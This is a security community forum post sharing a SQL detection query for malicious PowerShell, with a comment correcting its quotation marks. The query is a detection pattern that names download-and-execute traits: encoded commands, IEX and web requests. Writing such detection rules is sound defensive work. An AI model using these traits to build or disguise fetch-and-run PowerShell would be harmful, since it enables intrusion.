The VMware Carbon Black Tech Zone is live! Checkout this great resource: Mastering Carbon Black Audit & Remediation.

Malicious Powershell

Description: Detecting malicious powershell.

What The Data Shows: Looking for powershell arguments that can be linked to malicious executions.

SQL: 

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%" 
AND cmdline LIKE "%IEX%" 
AND cmdline LIKE "%web%" 
AND name = “powershell.exe”

 

 

0 Votes
3 Comments
Query_Admin
Community Manager
Community Manager
Status changed to: Approved
 
hardcoded
New Contributor

This script is using the right and left double quotation mark characters instead of the quotation mark character. If copied and pasted, the script won't run.

The amended version is:

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = "powershell.exe"
jnelson
Carbon Black Employee

@hardcoded Thanks for catching that and posting a fix! I did fix the original too.